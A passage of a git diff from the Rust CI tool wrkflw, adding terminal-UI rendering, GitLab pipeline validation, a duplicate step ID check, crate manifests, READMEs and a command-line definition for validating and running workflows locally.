                        Span::styled(rest, Style::default().fg(Color::White)),
                    ])
                } else {
                    // Original styling for other tabs
                    let (first, rest) = t.split_at(1);
                    Line::from(vec![
                        Span::styled(
                            first,
                            Style::default()
                                .fg(Color::Yellow)
                                .add_modifier(Modifier::UNDERLINED),
                        ),
                        Span::styled(rest, Style::default().fg(Color::White)),
                    ])
                }
            })
            .collect(),
    )
    .block(
        Block::default()
            .borders(Borders::ALL)
            .border_type(BorderType::Rounded)
            .title(Span::styled(
                " wrkflw ",
                Style::default()
                    .fg(Color::Cyan)
                    .add_modifier(Modifier::BOLD),
            ))
            .title_alignment(Alignment::Center),
    )
    .highlight_style(
        Style::default()
            .bg(Color::DarkGray)
            .fg(Color::Yellow)
            .add_modifier(Modifier::BOLD),
    )
    .select(app.selected_tab)
    .divider(Span::raw("|"));

    f.render_widget(tabs, area);
}
131 crates/ui/src/views/workflows_tab.rs (new file)
@@ -0,0 +1,131 @@
|
||||
// Workflows tab rendering
|
||||
use crate::app::App;
|
||||
use crate::models::WorkflowStatus;
|
||||
use ratatui::{
|
||||
backend::CrosstermBackend,
|
||||
layout::{Alignment, Constraint, Direction, Layout, Rect},
|
||||
style::{Color, Modifier, Style},
|
||||
text::{Line, Span},
|
||||
widgets::{Block, BorderType, Borders, Cell, Paragraph, Row, Table, TableState},
|
||||
Frame,
|
||||
};
|
||||
use std::io;
|
||||
|
||||
// Render the workflow list tab
|
||||
pub fn render_workflows_tab(
|
||||
f: &mut Frame<CrosstermBackend<io::Stdout>>,
|
||||
app: &mut App,
|
||||
area: Rect,
|
||||
) {
|
||||
// Create a more structured layout for the workflow tab
|
||||
let chunks = Layout::default()
|
||||
.direction(Direction::Vertical)
|
||||
.constraints(
|
||||
[
|
||||
Constraint::Length(3), // Header with instructions
|
||||
Constraint::Min(5), // Workflow list
|
||||
]
|
||||
.as_ref(),
|
||||
)
|
||||
.margin(1)
|
||||
.split(area);
|
||||
|
||||
// Render header with instructions
|
||||
let header_text = vec![
|
||||
Line::from(vec![Span::styled(
|
||||
"Available Workflows",
|
||||
Style::default()
|
||||
.fg(Color::Yellow)
|
||||
.add_modifier(Modifier::BOLD),
|
||||
)]),
|
||||
Line::from(vec![
|
||||
Span::styled("Space", Style::default().fg(Color::Cyan)),
|
||||
Span::raw(": Toggle selection "),
|
||||
Span::styled("Enter", Style::default().fg(Color::Cyan)),
|
||||
Span::raw(": Run "),
|
||||
Span::styled("t", Style::default().fg(Color::Cyan)),
|
||||
Span::raw(": Trigger remotely"),
|
||||
]),
|
||||
];
|
||||
|
||||
let header = Paragraph::new(header_text)
|
||||
.block(
|
||||
Block::default()
|
||||
.borders(Borders::ALL)
|
||||
.border_type(BorderType::Rounded),
|
||||
)
|
||||
.alignment(Alignment::Center);
|
||||
|
||||
f.render_widget(header, chunks[0]);
|
||||
|
||||
// Create a table for workflows instead of a list for better organization
|
||||
let selected_style = Style::default()
|
||||
.bg(Color::DarkGray)
|
||||
.add_modifier(Modifier::BOLD);
|
||||
|
||||
// Normal style definition removed as it was unused
|
||||
|
||||
let header_cells = ["", "Status", "Workflow Name", "Path"]
|
||||
.iter()
|
||||
.map(|h| Cell::from(*h).style(Style::default().fg(Color::Yellow)));
|
||||
|
||||
let header = Row::new(header_cells)
|
||||
.style(Style::default().add_modifier(Modifier::BOLD))
|
||||
.height(1);
|
||||
|
||||
let rows = app.workflows.iter().map(|workflow| {
|
||||
// Create cells for each column
|
||||
let checkbox = if workflow.selected { "✓" } else { " " };
|
||||
|
||||
let (status_symbol, status_style) = match workflow.status {
|
||||
WorkflowStatus::NotStarted => ("○", Style::default().fg(Color::Gray)),
|
||||
WorkflowStatus::Running => ("⟳", Style::default().fg(Color::Cyan)),
|
||||
WorkflowStatus::Success => ("✅", Style::default().fg(Color::Green)),
|
||||
WorkflowStatus::Failed => ("❌", Style::default().fg(Color::Red)),
|
||||
WorkflowStatus::Skipped => ("⏭", Style::default().fg(Color::Yellow)),
|
||||
};
|
||||
|
||||
let path_display = workflow.path.to_string_lossy();
|
||||
let path_shortened = if path_display.len() > 30 {
|
||||
format!("...{}", &path_display[path_display.len() - 30..])
|
||||
} else {
|
||||
path_display.to_string()
|
||||
};
|
||||
|
||||
Row::new(vec![
|
||||
Cell::from(checkbox).style(Style::default().fg(Color::Green)),
|
||||
Cell::from(status_symbol).style(status_style),
|
||||
Cell::from(workflow.name.clone()),
|
||||
Cell::from(path_shortened).style(Style::default().fg(Color::DarkGray)),
|
||||
])
|
||||
});
|
||||
|
||||
let workflows_table = Table::new(rows)
|
||||
.header(header)
|
||||
.block(
|
||||
Block::default()
|
||||
.borders(Borders::ALL)
|
||||
.border_type(BorderType::Rounded)
|
||||
.title(Span::styled(
|
||||
" Workflows ",
|
||||
Style::default().fg(Color::Yellow),
|
||||
)),
|
||||
)
|
||||
.highlight_style(selected_style)
|
||||
.highlight_symbol("» ")
|
||||
.widths(&[
|
||||
Constraint::Length(3), // Checkbox column
|
||||
Constraint::Length(4), // Status icon column
|
||||
Constraint::Percentage(45), // Name column
|
||||
Constraint::Percentage(45), // Path column
|
||||
]);
|
||||
|
||||
// We need to convert ListState to TableState
|
||||
let mut table_state = TableState::default();
|
||||
table_state.select(app.workflow_list_state.selected());
|
||||
|
||||
f.render_stateful_widget(workflows_table, chunks[1], &mut table_state);
|
||||
|
||||
// Update the app list state to match the table state
|
||||
app.workflow_list_state.select(table_state.selected());
|
||||
}
|
||||
20 crates/utils/Cargo.toml (new file)
@@ -0,0 +1,20 @@
[package]
name = "wrkflw-utils"
version.workspace = true
edition.workspace = true
description = "Utility functions for wrkflw workflow execution engine"
license.workspace = true
documentation.workspace = true
homepage.workspace = true
repository.workspace = true
keywords.workspace = true
categories.workspace = true

[dependencies]
# Internal crates
wrkflw-models = { path = "../models", version = "0.7.0" }

# External dependencies
serde.workspace = true
serde_yaml.workspace = true
nix.workspace = true
21 crates/utils/README.md (new file)
@@ -0,0 +1,21 @@
## wrkflw-utils

Shared helpers used across crates.

- Workflow file detection (`.github/workflows/*.yml`, `.gitlab-ci.yml`)
- File-descriptor redirection utilities for silencing noisy subprocess output

### Example

```rust
use std::path::Path;
use wrkflw_utils::{is_workflow_file, fd::with_stderr_to_null};

assert!(is_workflow_file(Path::new(".github/workflows/ci.yml")));

let value = with_stderr_to_null(|| {
    eprintln!("this is hidden");
    42
}).unwrap();
assert_eq!(value, 42);
```
crates/utils/src/lib.rs (changed)
@@ -1,6 +1,17 @@
// utils crate

use std::path::Path;

pub fn is_workflow_file(path: &Path) -> bool {
    // First, check for GitLab CI files by name
    if let Some(file_name) = path.file_name() {
        let file_name_str = file_name.to_string_lossy().to_lowercase();
        if file_name_str == ".gitlab-ci.yml" || file_name_str.ends_with("gitlab-ci.yml") {
            return true;
        }
    }

    // Then check for GitHub Actions workflows
    if let Some(ext) = path.extension() {
        if ext == "yml" || ext == "yaml" {
            // Check if the file is in a .github/workflows directory
@@ -47,7 +58,7 @@ pub mod fd {
        // Duplicate the current stderr fd
        let stderr_backup = match dup(STDERR_FILENO) {
            Ok(fd) => fd,
-            Err(e) => return Err(io::Error::new(io::ErrorKind::Other, e)),
+            Err(e) => return Err(io::Error::other(e)),
        };

        // Open /dev/null
@@ -55,7 +66,7 @@ pub mod fd {
            Ok(fd) => fd,
            Err(e) => {
                let _ = close(stderr_backup); // Clean up on error
-                return Err(io::Error::new(io::ErrorKind::Other, e));
+                return Err(io::Error::other(e));
            }
        };

@@ -63,7 +74,7 @@ pub mod fd {
        if let Err(e) = dup2(null_fd, STDERR_FILENO) {
            let _ = close(stderr_backup); // Clean up on error
            let _ = close(null_fd);
-            return Err(io::Error::new(io::ErrorKind::Other, e));
+            return Err(io::Error::other(e));
        }

        Ok(RedirectedStderr {
20 crates/validators/Cargo.toml (new file)
@@ -0,0 +1,20 @@
[package]
name = "wrkflw-validators"
version.workspace = true
edition.workspace = true
description = "Workflow validation functionality for wrkflw execution engine"
license.workspace = true
documentation.workspace = true
homepage.workspace = true
repository.workspace = true
keywords.workspace = true
categories.workspace = true

[dependencies]
# Internal crates
wrkflw-models = { path = "../models", version = "0.7.0" }
wrkflw-matrix = { path = "../matrix", version = "0.7.0" }

# External dependencies
serde.workspace = true
serde_yaml.workspace = true
29 crates/validators/README.md (new file)
@@ -0,0 +1,29 @@
## wrkflw-validators

Validation utilities for workflows and steps.

- Validates GitHub Actions sections: jobs, steps, actions references, triggers
- GitLab pipeline validation helpers
- Matrix-specific validation

### Example

```rust
use serde_yaml::Value;
use wrkflw_models::ValidationResult;
use wrkflw_validators::{validate_jobs, validate_triggers};

let yaml: Value = serde_yaml::from_str(r#"name: demo
on: [workflow_dispatch]
jobs: { build: { runs-on: ubuntu-latest, steps: [] } }
"#).unwrap();

let mut res = ValidationResult::new();
if let Some(on) = yaml.get("on") {
    validate_triggers(on, &mut res);
}
if let Some(jobs) = yaml.get("jobs") {
    validate_jobs(jobs, &mut res);
}
assert!(res.is_valid);
```
crates/validators/src/actions.rs (changed)
@@ -1,4 +1,4 @@
-use crate::models::ValidationResult;
+use wrkflw_models::ValidationResult;

pub fn validate_action_reference(
    action_ref: &str,
234 crates/validators/src/gitlab.rs (new file)
@@ -0,0 +1,234 @@
|
||||
use std::collections::HashMap;
|
||||
use wrkflw_models::gitlab::{Job, Pipeline};
|
||||
use wrkflw_models::ValidationResult;
|
||||
|
||||
/// Validate a GitLab CI/CD pipeline
|
||||
pub fn validate_gitlab_pipeline(pipeline: &Pipeline) -> ValidationResult {
|
||||
let mut result = ValidationResult::new();
|
||||
|
||||
// Basic structure validation
|
||||
if pipeline.jobs.is_empty() {
|
||||
result.add_issue("Pipeline must contain at least one job".to_string());
|
||||
}
|
||||
|
||||
// Validate jobs
|
||||
validate_jobs(&pipeline.jobs, &mut result);
|
||||
|
||||
// Validate stages if defined
|
||||
if let Some(stages) = &pipeline.stages {
|
||||
validate_stages(stages, &pipeline.jobs, &mut result);
|
||||
}
|
||||
|
||||
// Validate dependencies
|
||||
validate_dependencies(&pipeline.jobs, &mut result);
|
||||
|
||||
// Validate extends
|
||||
validate_extends(&pipeline.jobs, &mut result);
|
||||
|
||||
// Validate artifacts
|
||||
validate_artifacts(&pipeline.jobs, &mut result);
|
||||
|
||||
result
|
||||
}
|
||||
|
||||
/// Validate GitLab CI/CD jobs
|
||||
fn validate_jobs(jobs: &HashMap<String, Job>, result: &mut ValidationResult) {
|
||||
for (job_name, job) in jobs {
|
||||
// Skip template jobs
|
||||
if let Some(true) = job.template {
|
||||
continue;
|
||||
}
|
||||
|
||||
// Check for script or extends
|
||||
if job.script.is_none() && job.extends.is_none() {
|
||||
result.add_issue(format!(
|
||||
"Job '{}' must have a script section or extend another job",
|
||||
job_name
|
||||
));
|
||||
}
|
||||
|
||||
// Check when value if present
|
||||
if let Some(when) = &job.when {
|
||||
match when.as_str() {
|
||||
"on_success" | "on_failure" | "always" | "manual" | "never" => {
|
||||
// Valid when value
|
||||
}
|
||||
_ => {
|
||||
result.add_issue(format!(
|
||||
"Job '{}' has invalid 'when' value: '{}'. Valid values are: on_success, on_failure, always, manual, never",
|
||||
job_name, when
|
||||
));
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
// Check retry configuration
|
||||
if let Some(retry) = &job.retry {
|
||||
match retry {
|
||||
wrkflw_models::gitlab::Retry::MaxAttempts(attempts) => {
|
||||
if *attempts > 10 {
|
||||
result.add_issue(format!(
|
||||
"Job '{}' has excessive retry count: {}. Consider reducing to avoid resource waste",
|
||||
job_name, attempts
|
||||
));
|
||||
}
|
||||
}
|
||||
wrkflw_models::gitlab::Retry::Detailed { max, when: _ } => {
|
||||
if *max > 10 {
|
||||
result.add_issue(format!(
|
||||
"Job '{}' has excessive retry count: {}. Consider reducing to avoid resource waste",
|
||||
job_name, max
|
||||
));
|
||||
}
|
||||
}
|
||||
}
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
/// Validate GitLab CI/CD stages
|
||||
fn validate_stages(stages: &[String], jobs: &HashMap<String, Job>, result: &mut ValidationResult) {
|
||||
// Check that all jobs reference existing stages
|
||||
for (job_name, job) in jobs {
|
||||
if let Some(stage) = &job.stage {
|
||||
if !stages.contains(stage) {
|
||||
result.add_issue(format!(
|
||||
"Job '{}' references undefined stage '{}'. Available stages are: {}",
|
||||
job_name,
|
||||
stage,
|
||||
stages.join(", ")
|
||||
));
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
// Check for unused stages
|
||||
for stage in stages {
|
||||
let used = jobs.values().any(|job| {
|
||||
if let Some(job_stage) = &job.stage {
|
||||
job_stage == stage
|
||||
} else {
|
||||
false
|
||||
}
|
||||
});
|
||||
|
||||
if !used {
|
||||
result.add_issue(format!(
|
||||
"Stage '{}' is defined but not used by any job",
|
||||
stage
|
||||
));
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
/// Validate GitLab CI/CD job dependencies
|
||||
fn validate_dependencies(jobs: &HashMap<String, Job>, result: &mut ValidationResult) {
|
||||
for (job_name, job) in jobs {
|
||||
if let Some(dependencies) = &job.dependencies {
|
||||
for dependency in dependencies {
|
||||
if !jobs.contains_key(dependency) {
|
||||
result.add_issue(format!(
|
||||
"Job '{}' depends on undefined job '{}'",
|
||||
job_name, dependency
|
||||
));
|
||||
} else if job_name == dependency {
|
||||
result.add_issue(format!("Job '{}' cannot depend on itself", job_name));
|
||||
}
|
||||
}
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
/// Validate GitLab CI/CD job extends
|
||||
fn validate_extends(jobs: &HashMap<String, Job>, result: &mut ValidationResult) {
|
||||
// Check for circular extends
|
||||
for (job_name, job) in jobs {
|
||||
if let Some(extends) = &job.extends {
|
||||
// Check that all extended jobs exist
|
||||
for extend in extends {
|
||||
if !jobs.contains_key(extend) {
|
||||
result.add_issue(format!(
|
||||
"Job '{}' extends undefined job '{}'",
|
||||
job_name, extend
|
||||
));
|
||||
continue;
|
||||
}
|
||||
|
||||
// Check for circular extends
|
||||
let mut visited = vec![job_name.clone()];
|
||||
check_circular_extends(extend, jobs, &mut visited, result);
|
||||
}
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
/// Helper function to detect circular extends
|
||||
fn check_circular_extends(
|
||||
job_name: &str,
|
||||
jobs: &HashMap<String, Job>,
|
||||
visited: &mut Vec<String>,
|
||||
result: &mut ValidationResult,
|
||||
) {
|
||||
visited.push(job_name.to_string());
|
||||
|
||||
if let Some(job) = jobs.get(job_name) {
|
||||
if let Some(extends) = &job.extends {
|
||||
for extend in extends {
|
||||
if visited.contains(&extend.to_string()) {
|
||||
// Circular dependency detected
|
||||
let cycle = visited
|
||||
.iter()
|
||||
.skip(visited.iter().position(|x| x == extend).unwrap())
|
||||
.chain(std::iter::once(extend))
|
||||
.cloned()
|
||||
.collect::<Vec<_>>()
|
||||
.join(" -> ");
|
||||
|
||||
result.add_issue(format!("Circular extends detected: {}", cycle));
|
||||
return;
|
||||
}
|
||||
|
||||
check_circular_extends(extend, jobs, visited, result);
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
visited.pop();
|
||||
}
|
||||
|
||||
/// Validate GitLab CI/CD job artifacts
|
||||
fn validate_artifacts(jobs: &HashMap<String, Job>, result: &mut ValidationResult) {
|
||||
for (job_name, job) in jobs {
|
||||
if let Some(artifacts) = &job.artifacts {
|
||||
// Check that paths are specified
|
||||
if let Some(paths) = &artifacts.paths {
|
||||
if paths.is_empty() {
|
||||
result.add_issue(format!(
|
||||
"Job '{}' has artifacts section with empty paths",
|
||||
job_name
|
||||
));
|
||||
}
|
||||
} else {
|
||||
result.add_issue(format!(
|
||||
"Job '{}' has artifacts section without specifying paths",
|
||||
job_name
|
||||
));
|
||||
}
|
||||
|
||||
// Check for valid 'when' value if present
|
||||
if let Some(when) = &artifacts.when {
|
||||
match when.as_str() {
|
||||
"on_success" | "on_failure" | "always" => {
|
||||
// Valid when value
|
||||
}
|
||||
_ => {
|
||||
result.add_issue(format!(
|
||||
"Job '{}' has artifacts with invalid 'when' value: '{}'. Valid values are: on_success, on_failure, always",
|
||||
job_name, when
|
||||
));
|
||||
}
|
||||
}
|
||||
}
|
||||
}
|
||||
}
|
||||
}
|
||||
crates/validators/src/jobs.rs (changed)
@@ -1,6 +1,6 @@
-use crate::models::ValidationResult;
-use crate::validators::{validate_matrix, validate_steps};
+use crate::{validate_matrix, validate_steps};
use serde_yaml::Value;
+use wrkflw_models::ValidationResult;

pub fn validate_jobs(jobs: &Value, result: &mut ValidationResult) {
    if let Value::Mapping(jobs_map) = jobs {

crates/validators/src/lib.rs (changed)
@@ -1,10 +1,14 @@
// validators crate

mod actions;
mod gitlab;
mod jobs;
mod matrix;
mod steps;
mod triggers;

pub use actions::validate_action_reference;
pub use gitlab::validate_gitlab_pipeline;
pub use jobs::validate_jobs;
pub use matrix::validate_matrix;
pub use steps::validate_steps;

crates/validators/src/matrix.rs (changed)
@@ -1,5 +1,5 @@
-use crate::models::ValidationResult;
use serde_yaml::Value;
+use wrkflw_models::ValidationResult;

pub fn validate_matrix(matrix: &Value, result: &mut ValidationResult) {
    // Check if matrix is a mapping

crates/validators/src/steps.rs (changed)
@@ -1,8 +1,11 @@
-use crate::models::ValidationResult;
-use crate::validators::validate_action_reference;
+use crate::validate_action_reference;
use serde_yaml::Value;
+use std::collections::HashSet;
+use wrkflw_models::ValidationResult;

pub fn validate_steps(steps: &[Value], job_name: &str, result: &mut ValidationResult) {
+    let mut step_ids: HashSet<String> = HashSet::new();

    for (i, step) in steps.iter().enumerate() {
        if let Some(step_map) = step.as_mapping() {
            if !step_map.contains_key(Value::String("name".to_string()))
@@ -27,6 +30,18 @@ pub fn validate_steps(steps: &[Value], job_name: &str, result: &mut ValidationRe
                ));
            }

+            // Check for duplicate step IDs
+            if let Some(Value::String(id)) = step_map.get(Value::String("id".to_string())) {
+                if !step_ids.insert(id.clone()) {
+                    result.add_issue(format!(
+                        "Job '{}', step {}: The identifier '{}' may not be used more than once within the same scope",
+                        job_name,
+                        i + 1,
+                        id
+                    ));
+                }
+            }

            // Validate action reference if 'uses' is present
            if let Some(Value::String(uses)) = step_map.get(Value::String("uses".to_string())) {
                validate_action_reference(uses, job_name, i, result);

crates/validators/src/triggers.rs (changed)
@@ -1,5 +1,5 @@
-use crate::models::ValidationResult;
use serde_yaml::Value;
+use wrkflw_models::ValidationResult;

pub fn validate_triggers(on: &Value, result: &mut ValidationResult) {
    let valid_events = vec![
65 crates/wrkflw/Cargo.toml (new file)
@@ -0,0 +1,65 @@
[package]
name = "wrkflw"
version.workspace = true
edition.workspace = true
description.workspace = true
documentation.workspace = true
homepage.workspace = true
repository.workspace = true
keywords.workspace = true
categories.workspace = true
license.workspace = true

[dependencies]
# Workspace crates
wrkflw-models = { path = "../models", version = "0.7.0" }
wrkflw-executor = { path = "../executor", version = "0.7.0" }
wrkflw-github = { path = "../github", version = "0.7.0" }
wrkflw-gitlab = { path = "../gitlab", version = "0.7.0" }
wrkflw-logging = { path = "../logging", version = "0.7.0" }
wrkflw-matrix = { path = "../matrix", version = "0.7.0" }
wrkflw-parser = { path = "../parser", version = "0.7.0" }
wrkflw-runtime = { path = "../runtime", version = "0.7.0" }
wrkflw-ui = { path = "../ui", version = "0.7.0" }
wrkflw-utils = { path = "../utils", version = "0.7.0" }
wrkflw-validators = { path = "../validators", version = "0.7.0" }
wrkflw-evaluator = { path = "../evaluator", version = "0.7.0" }

# External dependencies
clap.workspace = true
bollard.workspace = true
tokio.workspace = true
futures-util.workspace = true
futures.workspace = true
chrono.workspace = true
uuid.workspace = true
tempfile.workspace = true
dirs.workspace = true
thiserror.workspace = true
log.workspace = true
regex.workspace = true
lazy_static.workspace = true
reqwest.workspace = true
libc.workspace = true
nix.workspace = true
urlencoding.workspace = true
serde.workspace = true
serde_yaml.workspace = true
serde_json.workspace = true
colored.workspace = true
indexmap.workspace = true
rayon.workspace = true
num_cpus.workspace = true
itertools.workspace = true
once_cell.workspace = true
crossterm.workspace = true
ratatui.workspace = true
walkdir = "2.4"

[lib]
name = "wrkflw_lib"
path = "src/lib.rs"

[[bin]]
name = "wrkflw"
path = "src/main.rs"
112 crates/wrkflw/README.md (new file)
@@ -0,0 +1,112 @@
## WRKFLW (CLI and Library)

This crate provides the `wrkflw` command-line interface and a thin library surface that ties together all WRKFLW subcrates. It lets you validate and execute GitHub Actions workflows and GitLab CI pipelines locally, with a built-in TUI for an interactive experience.

- **Validate**: Lints structure and common mistakes in workflow/pipeline files
- **Run**: Executes jobs locally using Docker, Podman, or emulation (no containers)
- **TUI**: Interactive terminal UI for browsing workflows, running, and viewing logs
- **Trigger**: Manually trigger remote runs on GitHub/GitLab

### Installation

```bash
cargo install wrkflw
```

### Quick start

```bash
# Launch the TUI (auto-loads .github/workflows)
wrkflw

# Validate all workflows in the default directory
wrkflw validate

# Validate a specific file or directory
wrkflw validate .github/workflows/ci.yml
wrkflw validate path/to/workflows

# Validate multiple files and/or directories
wrkflw validate path/to/flow-1.yml path/to/flow-2.yml path/to/workflows

# Run a workflow (Docker by default)
wrkflw run .github/workflows/ci.yml

# Use Podman or emulation instead of Docker
wrkflw run --runtime podman .github/workflows/ci.yml
wrkflw run --runtime emulation .github/workflows/ci.yml

# Open the TUI explicitly
wrkflw tui
wrkflw tui --runtime podman
```

### Commands

- **validate**: Validate workflow/pipeline files and/or directories
  - GitHub (default): `.github/workflows/*.yml`
  - GitLab: `.gitlab-ci.yml` or files ending with `gitlab-ci.yml`
  - Accepts multiple paths in a single invocation
  - Exit code behavior (by default): `1` when any validation failure is detected
  - Flags: `--gitlab`, `--exit-code`, `--no-exit-code`, `--verbose`

- **run**: Execute a workflow or pipeline locally
  - Runtimes: `docker` (default), `podman`, `emulation`
  - Flags: `--runtime`, `--preserve-containers-on-failure`, `--gitlab`, `--verbose`

- **tui**: Interactive terminal interface
  - Browse workflows, execute, and inspect logs and job details

- **trigger**: Trigger a GitHub workflow (requires `GITHUB_TOKEN`)
- **trigger-gitlab**: Trigger a GitLab pipeline (requires `GITLAB_TOKEN`)
- **list**: Show detected workflows and pipelines in the repo
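
As a brief illustration of the `--gitlab` and `--runtime` flags listed above (the file names are placeholders):

```bash
# Validate a GitLab pipeline explicitly, then run it with Podman
wrkflw validate --gitlab .gitlab-ci.yml
wrkflw run --gitlab --runtime podman .gitlab-ci.yml
```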

### Environment variables

- **GITHUB_TOKEN**: Required for `trigger` when calling GitHub
- **GITLAB_TOKEN**: Required for `trigger-gitlab` (api scope)
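
A sketch of how these fit together; the token values, workflow name, branch, and key=value pairs below are placeholders rather than values from this repository:

```bash
# GitHub: dispatch .github/workflows/ci.yml on a branch, passing an input
export GITHUB_TOKEN=<token>
wrkflw trigger ci --branch main --input version=1.2.3

# GitLab: start a pipeline with a variable
export GITLAB_TOKEN=<token>
wrkflw trigger-gitlab --branch main --variable DEPLOY_ENV=staging
```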

### Exit codes

- `validate`: `0` if all pass; `1` if any fail (unless `--no-exit-code`)
- `run`: `0` on success, `1` if execution fails
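
As a small usage sketch (the directory path is a placeholder), the default exit code can gate a CI step, while `--no-exit-code` keeps a purely advisory check from failing it:

```bash
wrkflw validate .github/workflows                  # step fails if any workflow is invalid
wrkflw validate --no-exit-code .github/workflows   # reports issues without failing the step
```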

### Library usage

This crate re-exports subcrates for convenience if you want to embed functionality:

```rust
use std::path::Path;
use wrkflw::executor::{execute_workflow, ExecutionConfig, RuntimeType};

# tokio_test::block_on(async {
let cfg = ExecutionConfig {
    runtime_type: RuntimeType::Docker,
    verbose: true,
    preserve_containers_on_failure: false,
};
let result = execute_workflow(Path::new(".github/workflows/ci.yml"), cfg).await?;
println!("status: {:?}", result.summary_status);
# Ok::<_, Box<dyn std::error::Error>>(())
# })?;
```

You can also run the TUI programmatically:

```rust
use std::path::PathBuf;
use wrkflw::executor::RuntimeType;
use wrkflw::ui::run_wrkflw_tui;

# tokio_test::block_on(async {
let path = PathBuf::from(".github/workflows");
run_wrkflw_tui(Some(&path), RuntimeType::Docker, true, false).await?;
# Ok::<_, Box<dyn std::error::Error>>(())
# })?;
```

### Notes

- See the repository root README for feature details, limitations, and a full walkthrough.
- Service containers and advanced Actions features are best supported in Docker/Podman modes.
- Emulation mode skips containerized steps and runs commands on the host.
12 crates/wrkflw/src/lib.rs (new file)
@@ -0,0 +1,12 @@
pub use wrkflw_evaluator as evaluator;
pub use wrkflw_executor as executor;
pub use wrkflw_github as github;
pub use wrkflw_gitlab as gitlab;
pub use wrkflw_logging as logging;
pub use wrkflw_matrix as matrix;
pub use wrkflw_models as models;
pub use wrkflw_parser as parser;
pub use wrkflw_runtime as runtime;
pub use wrkflw_ui as ui;
pub use wrkflw_utils as utils;
pub use wrkflw_validators as validators;
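A minimal downstream sketch, not taken from this commit, of how the re-exports above can be consumed; it assumes only the validator API shown earlier in this diff:

```rust
use wrkflw::models::ValidationResult;
use wrkflw::validators::validate_triggers;

fn check_triggers(on: &serde_yaml::Value) -> ValidationResult {
    // validate_triggers records any problems on the result it is given
    let mut result = ValidationResult::new();
    validate_triggers(on, &mut result);
    result
}
```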
707 crates/wrkflw/src/main.rs (new file)
@@ -0,0 +1,707 @@
|
||||
use bollard::Docker;
|
||||
use clap::{Parser, Subcommand, ValueEnum};
|
||||
use std::collections::HashMap;
|
||||
use std::path::Path;
|
||||
use std::path::PathBuf;
|
||||
|
||||
#[derive(Debug, Clone, ValueEnum)]
|
||||
enum RuntimeChoice {
|
||||
/// Use Docker containers for isolation
|
||||
Docker,
|
||||
/// Use Podman containers for isolation
|
||||
Podman,
|
||||
/// Use process emulation mode (no containers, UNSAFE)
|
||||
Emulation,
|
||||
/// Use secure emulation mode with sandboxing (recommended for untrusted code)
|
||||
SecureEmulation,
|
||||
}
|
||||
|
||||
impl From<RuntimeChoice> for wrkflw_executor::RuntimeType {
|
||||
fn from(choice: RuntimeChoice) -> Self {
|
||||
match choice {
|
||||
RuntimeChoice::Docker => wrkflw_executor::RuntimeType::Docker,
|
||||
RuntimeChoice::Podman => wrkflw_executor::RuntimeType::Podman,
|
||||
RuntimeChoice::Emulation => wrkflw_executor::RuntimeType::Emulation,
|
||||
RuntimeChoice::SecureEmulation => wrkflw_executor::RuntimeType::SecureEmulation,
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
#[derive(Debug, Parser)]
|
||||
#[command(
|
||||
name = "wrkflw",
|
||||
about = "GitHub & GitLab CI/CD validator and executor",
|
||||
version,
|
||||
long_about = "A CI/CD validator and executor that runs workflows locally.\n\nExamples:\n wrkflw validate # Validate all workflows in .github/workflows\n wrkflw run .github/workflows/build.yml # Run a specific workflow\n wrkflw run .gitlab-ci.yml # Run a GitLab CI pipeline\n wrkflw --verbose run .github/workflows/build.yml # Run with more output\n wrkflw --debug run .github/workflows/build.yml # Run with detailed debug information\n wrkflw run --runtime emulation .github/workflows/build.yml # Use emulation mode instead of containers\n wrkflw run --runtime podman .github/workflows/build.yml # Use Podman instead of Docker\n wrkflw run --preserve-containers-on-failure .github/workflows/build.yml # Keep failed containers for debugging"
|
||||
)]
|
||||
struct Wrkflw {
|
||||
#[command(subcommand)]
|
||||
command: Option<Commands>,
|
||||
|
||||
/// Run in verbose mode with detailed output
|
||||
#[arg(short, long, global = true)]
|
||||
verbose: bool,
|
||||
|
||||
/// Run in debug mode with extensive execution details
|
||||
#[arg(short, long, global = true)]
|
||||
debug: bool,
|
||||
}
|
||||
|
||||
#[derive(Debug, Subcommand)]
|
||||
enum Commands {
|
||||
/// Validate workflow or pipeline files
|
||||
Validate {
|
||||
/// Path(s) to workflow/pipeline file(s) or directory(ies) (defaults to .github/workflows if none provided)
|
||||
#[arg(value_name = "path", num_args = 0..)]
|
||||
paths: Vec<PathBuf>,
|
||||
|
||||
/// Explicitly validate as GitLab CI/CD pipeline
|
||||
#[arg(long)]
|
||||
gitlab: bool,
|
||||
|
||||
/// Set exit code to 1 on validation failure
|
||||
#[arg(long = "exit-code", default_value_t = true)]
|
||||
exit_code: bool,
|
||||
|
||||
/// Don't set exit code to 1 on validation failure (overrides --exit-code)
|
||||
#[arg(long = "no-exit-code", conflicts_with = "exit_code")]
|
||||
no_exit_code: bool,
|
||||
},
|
||||
|
||||
/// Execute workflow or pipeline files locally
|
||||
Run {
|
||||
/// Path to workflow/pipeline file to execute
|
||||
path: PathBuf,
|
||||
|
||||
/// Container runtime to use (docker, podman, emulation, secure-emulation)
|
||||
#[arg(short, long, value_enum, default_value = "docker")]
|
||||
runtime: RuntimeChoice,
|
||||
|
||||
/// Show 'Would execute GitHub action' messages in emulation mode
|
||||
#[arg(long, default_value_t = false)]
|
||||
show_action_messages: bool,
|
||||
|
||||
/// Preserve Docker containers on failure for debugging (Docker mode only)
|
||||
#[arg(long)]
|
||||
preserve_containers_on_failure: bool,
|
||||
|
||||
/// Explicitly run as GitLab CI/CD pipeline
|
||||
#[arg(long)]
|
||||
gitlab: bool,
|
||||
},
|
||||
|
||||
/// Open TUI interface to manage workflows
|
||||
Tui {
|
||||
/// Path to workflow file or directory (defaults to .github/workflows)
|
||||
path: Option<PathBuf>,
|
||||
|
||||
/// Container runtime to use (docker, podman, emulation, secure-emulation)
|
||||
#[arg(short, long, value_enum, default_value = "docker")]
|
||||
runtime: RuntimeChoice,
|
||||
|
||||
/// Show 'Would execute GitHub action' messages in emulation mode
|
||||
#[arg(long, default_value_t = false)]
|
||||
show_action_messages: bool,
|
||||
|
||||
/// Preserve Docker containers on failure for debugging (Docker mode only)
|
||||
#[arg(long)]
|
||||
preserve_containers_on_failure: bool,
|
||||
},
|
||||
|
||||
/// Trigger a GitHub workflow remotely
|
||||
Trigger {
|
||||
/// Name of the workflow file (without .yml extension)
|
||||
workflow: String,
|
||||
|
||||
/// Branch to run the workflow on
|
